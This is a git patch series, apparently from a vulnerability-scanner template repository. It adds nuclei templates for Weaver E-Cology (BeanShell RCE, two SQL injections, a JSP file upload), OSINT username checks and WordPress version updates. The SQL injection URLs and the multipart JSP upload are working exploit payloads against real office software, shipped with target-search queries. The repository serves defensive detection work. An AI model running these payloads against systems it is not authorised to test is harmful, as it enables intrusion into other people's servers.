info: - name: Weaver E-Cology BeanShell Remote Command Execution + name: Weaver E-Cology BeanShell - Remote Command Execution author: SleepingBag945 severity: critical - description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + description: | + Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + metadata: + max-request: 1 + verified: true + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" tags: beanshell,rce,weaver http: @@ -16,7 +22,6 @@ http: bsh.script=print%28%22{{randstr}}%22%29%3B - - raw: - | # bypass waf POST /weaver/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} @@ -26,15 +31,12 @@ http: matchers-condition: and matchers: - - type: word - words: + - type: regex + regex: - "BeanShell Test Servlet" - - type: word - words: - - "{{randstr}}" + - "(?i)
(\n.*){{randstr}}"
+        condition: and
 
       - type: status
         status:
-          - 200
-
-# Enhanced by cs on 2022/07/05
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..a852d8407d
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,39 @@
+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..b4114c2f61
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,35 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
new file mode 100755
index 0000000000..ded95bff68
--- /dev/null
+++ b/http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
@@ -0,0 +1,57 @@
+id: weaver-ktreeuploadaction-file-upload
+
+info:
+  name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
+  author: SleepingBag945
+  severity: critical
+  description: |
+    There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
+  reference:
+    - https://buaq.net/go-117479.html
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,fileupload,intrusive
+
+variables:
+  num1: "{{rand_int(40000, 50000)}}"
+  num2: "{{rand_int(40000, 50000)}}"
+  result: "{{to_number(num1)*to_number(num2)}}"
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
+
+        ------WebKitFormBoundarywgljfvib
+        Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
+        Content-Type: image/jpeg
+
+        <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+        ------WebKitFormBoundarywgljfvib--
+
+      - |
+        @timeout: 20s
+        GET {{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl: 
+          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
+          - "contains(body_2, '{{result}}') && status_code_2 == 200"
+        condition: and
+
+    extractors:
+      - type: regex
+        name: filename
+        group: 1
+        regex:
+          - "','url':'(.*?)','title"
+        internal: true
\ No newline at end of file

From 25593b4df3d91acde42e39c45ee392a4be308468 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha 
Date: Fri, 15 Sep 2023 00:56:31 +0530
Subject: [PATCH 0356/1090] duplicates deleted

---
 http/vulnerabilities/landray/landray-oa-datajson-rce.yaml         | 0
 http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml         | 0
 ...enet-acereporter-report-component-arbitrary-file-download.yaml | 0
 .../other/avcon6-org-execl-download-arbitrary-file-download.yaml  | 0
 http/vulnerabilities/other/h2console-unauth.yaml                  | 0
 .../vulnerabilities/other/kingdee-apusic-directory-traversal.yaml | 0
 .../weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml     | 0
 http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml     | 0
 8 files changed, 0 insertions(+), 0 deletions(-)
 delete mode 100755 http/vulnerabilities/landray/landray-oa-datajson-rce.yaml
 delete mode 100755 http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml
 delete mode 100755 http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml
 delete mode 100755 http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml
 delete mode 100755 http/vulnerabilities/other/h2console-unauth.yaml
 delete mode 100755 http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml
 delete mode 100644 http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml
 delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml

diff --git a/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml b/http/vulnerabilities/landray/landray-oa-datajson-rce.yaml
deleted file mode 100755
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml b/http/vulnerabilities/landray/landray-oa-erp-data-rce.yaml
deleted file mode 100755
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml b/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml
deleted file mode 100755
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml b/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml
deleted file mode 100755
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/other/h2console-unauth.yaml b/http/vulnerabilities/other/h2console-unauth.yaml
deleted file mode 100755
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml b/http/vulnerabilities/other/kingdee-apusic-directory-traversal.yaml
deleted file mode 100755
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml
deleted file mode 100755
index e69de29bb2..0000000000

From 269f22a2c7211e77869b8f2f890e6e3e2a5d74d8 Mon Sep 17 00:00:00 2001
From: Philippe Delteil 
Date: Thu, 14 Sep 2023 20:27:10 -0500
Subject: [PATCH 0357/1090] Create intigriti.yaml

---
 http/osint/intigriti.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/osint/intigriti.yaml

diff --git a/http/osint/intigriti.yaml b/http/osint/intigriti.yaml
new file mode 100644
index 0000000000..d90ba6a26f
--- /dev/null
+++ b/http/osint/intigriti.yaml
@@ -0,0 +1,29 @@
+id: intigriti
+
+info:
+  name: Intigriti User Name Information - Detect
+  author: philippedelteil
+  description: Intigriti user name information check was conducted.
+  severity: info
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: osint,osint-tech,intigriti
+  metadata:
+    max-request: 1
+self-contained: true
+http:
+  - method: GET
+    path:
+      - "https://app.intigriti.com/profile/{{user}}"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "We didn't find what you're looking for"
+        negative: true

From 8cb45407ea88cc382baffed322e7fd0abb09a100 Mon Sep 17 00:00:00 2001
From: Philippe Delteil 
Date: Thu, 14 Sep 2023 20:47:54 -0500
Subject: [PATCH 0358/1090] Create yeswehack.yaml

---
 http/osint/yeswehack.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 http/osint/yeswehack.yaml

diff --git a/http/osint/yeswehack.yaml b/http/osint/yeswehack.yaml
new file mode 100644
index 0000000000..5c4cb1cb08
--- /dev/null
+++ b/http/osint/yeswehack.yaml
@@ -0,0 +1,27 @@
+id: yeswehack
+
+info:
+  name: Yeswehack User Name Information - Detect
+  author: philippedelteil
+  description: Yeswehack user name information check was conducted. (https://yeswehack.com/). 
+               Detection will work if the profile is set to be public. 
+  severity: info
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: osint,osint-tech,yeswehack
+  metadata:
+    max-request: 1
+
+self-contained: true
+http:
+  - method: GET
+    path:
+      - "https://api.yeswehack.com/hacktivity/{{user}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200

From 256b196cdb8b097f5a2e53ce57f7d64ad535b649 Mon Sep 17 00:00:00 2001
From: Philippe Delteil 
Date: Thu, 14 Sep 2023 20:59:27 -0500
Subject: [PATCH 0359/1090] Create hackenproof.yaml

---
 http/osint/hackenproof.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 http/osint/hackenproof.yaml

diff --git a/http/osint/hackenproof.yaml b/http/osint/hackenproof.yaml
new file mode 100644
index 0000000000..1520580d80
--- /dev/null
+++ b/http/osint/hackenproof.yaml
@@ -0,0 +1,27 @@
+id: hackenproof
+
+info:
+  name: Hackenproof User Name Information - Detect
+  author: philippedelteil
+  description: Hackenproof user name information check was conducted. (https://hackenproof.com/).
+
+  severity: info
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cwe-id: CWE-200
+  tags: osint,osint-tech,hackenproof
+  metadata:
+    max-request: 1
+
+self-contained: true
+http:
+  - method: GET
+    path:
+      - "https://hackenproof.com/hackers/{{user}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200

From 33f5bd5d4663f7a1cb34a59cc69df21009287530 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 04:02:22 +0000
Subject: [PATCH 0360/1090] Auto WordPress Plugins Update [Fri Sep 15 04:02:22
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/all-in-one-seo-pack.txt              | 2 +-
 helpers/wordpress/plugins/elementor.txt                        | 2 +-
 helpers/wordpress/plugins/enable-media-replace.txt             | 2 +-
 .../wordpress/plugins/essential-addons-for-elementor-lite.txt  | 2 +-
 helpers/wordpress/plugins/google-listings-and-ads.txt          | 2 +-
 helpers/wordpress/plugins/kadence-blocks.txt                   | 2 +-
 helpers/wordpress/plugins/newsletter.txt                       | 2 +-
 helpers/wordpress/plugins/ninja-forms.txt                      | 2 +-
 helpers/wordpress/plugins/redux-framework.txt                  | 2 +-
 helpers/wordpress/plugins/shortpixel-image-optimiser.txt       | 2 +-
 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt       | 2 +-
 helpers/wordpress/plugins/woocommerce-payments.txt             | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml           | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml            | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml     | 1 -
 .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml               | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml        | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml   | 1 -
 .../wordpress/plugins/all-in-one-wp-migration.yaml             | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
 http/technologies/wordpress/plugins/amp.yaml                   | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml          | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml         | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml           | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml              | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml    | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml         | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml      | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml   | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml            | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml        | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml       | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml          | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                  | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml              | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml         | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml           | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml        | 1 -
 .../wordpress/plugins/contact-form-7-honeypot.yaml             | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml        | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml    | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml       | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml         | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml    | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml   | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml         | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml   | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml      | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml     | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml            | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml     | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml         | 1 -
 .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml      | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml       | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml  | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml     | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml     | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml              | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml            | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml          | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml         | 1 -
 http/technologies/wordpress/plugins/formidable.yaml            | 1 -
 http/technologies/wordpress/plugins/forminator.yaml            | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml   | 1 -
 .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml   | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml      | 1 -
 .../wordpress/plugins/google-listings-and-ads.yaml             | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml       | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml            | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml            | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml             | 1 -
 .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml          | 1 -
 .../wordpress/plugins/header-footer-elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml         | 1 -
 http/technologies/wordpress/plugins/health-check.yaml          | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml           | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml   | 1 -
 http/technologies/wordpress/plugins/imagify.yaml               | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml              | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml          | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml        | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml         | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml            | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml         | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml               | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml        | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                 | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml       | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml  | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml        | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml             | 1 -
 http/technologies/wordpress/plugins/loginpress.yaml            | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml      | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml              | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml           | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml          | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml      | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml              | 1 -
 http/technologies/wordpress/plugins/members.yaml               | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml              | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml             | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml            | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml            | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml       | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml           | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml           | 1 -
 .../wordpress/plugins/official-facebook-pixel.yaml             | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml          | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml          | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml    | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml          | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml         | 1 -
 http/technologies/wordpress/plugins/polylang.yaml              | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml         | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml           | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml             | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml      | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml        | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml           | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml     | 1 -
 http/technologies/wordpress/plugins/redirection.yaml           | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml       | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml              | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml      | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml         | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml           | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml   | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml          | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml            | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml             | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml     | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml        | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml     | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml        | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml           | 1 -
 .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml            | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml  | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml   | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml   | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml      | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml         | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml       | 1 -
 .../wordpress/plugins/under-construction-page.yaml             | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml           | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml          | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml      | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml            | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml        | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml            | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml          | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml            | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml       | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml       | 1 -
 .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml   | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml          | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml  | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml         | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml        | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml  | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml             | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml    | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml         | 1 -
 http/technologies/wordpress/plugins/worker.yaml                | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml      | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml   | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml              | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml            | 3 +--
 http/technologies/wordpress/plugins/wp-statistics.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml       | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml        | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml          | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml        | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml           | 1 -
 212 files changed, 13 insertions(+), 213 deletions(-)

diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
index 3b5ab14de2..b58299c38c 100644
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@@ -1 +1 @@
-4.4.5.1
\ No newline at end of file
+4.4.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt
index 610ddad1b1..bc3bd8b4d8 100644
--- a/helpers/wordpress/plugins/elementor.txt
+++ b/helpers/wordpress/plugins/elementor.txt
@@ -1 +1 @@
-3.16.2
\ No newline at end of file
+3.16.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/enable-media-replace.txt b/helpers/wordpress/plugins/enable-media-replace.txt
index cd9b8f559e..8c7fafd365 100644
--- a/helpers/wordpress/plugins/enable-media-replace.txt
+++ b/helpers/wordpress/plugins/enable-media-replace.txt
@@ -1 +1 @@
-4.1.2
\ No newline at end of file
+4.1.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
index 6f4fe76b09..3303dc1e62 100644
--- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
+++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
@@ -1 +1 @@
-5.8.8
\ No newline at end of file
+5.8.9
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt
index 160fe391c8..1b03fe63dd 100644
--- a/helpers/wordpress/plugins/google-listings-and-ads.txt
+++ b/helpers/wordpress/plugins/google-listings-and-ads.txt
@@ -1 +1 @@
-2.5.5
\ No newline at end of file
+2.5.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt
index d96f69cdd5..ac16d4fc61 100644
--- a/helpers/wordpress/plugins/kadence-blocks.txt
+++ b/helpers/wordpress/plugins/kadence-blocks.txt
@@ -1 +1 @@
-3.1.14
\ No newline at end of file
+3.1.15
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt
index e048e60ec1..5dae366723 100644
--- a/helpers/wordpress/plugins/newsletter.txt
+++ b/helpers/wordpress/plugins/newsletter.txt
@@ -1 +1 @@
-7.9.2
\ No newline at end of file
+7.9.3
\ No newline at end of file
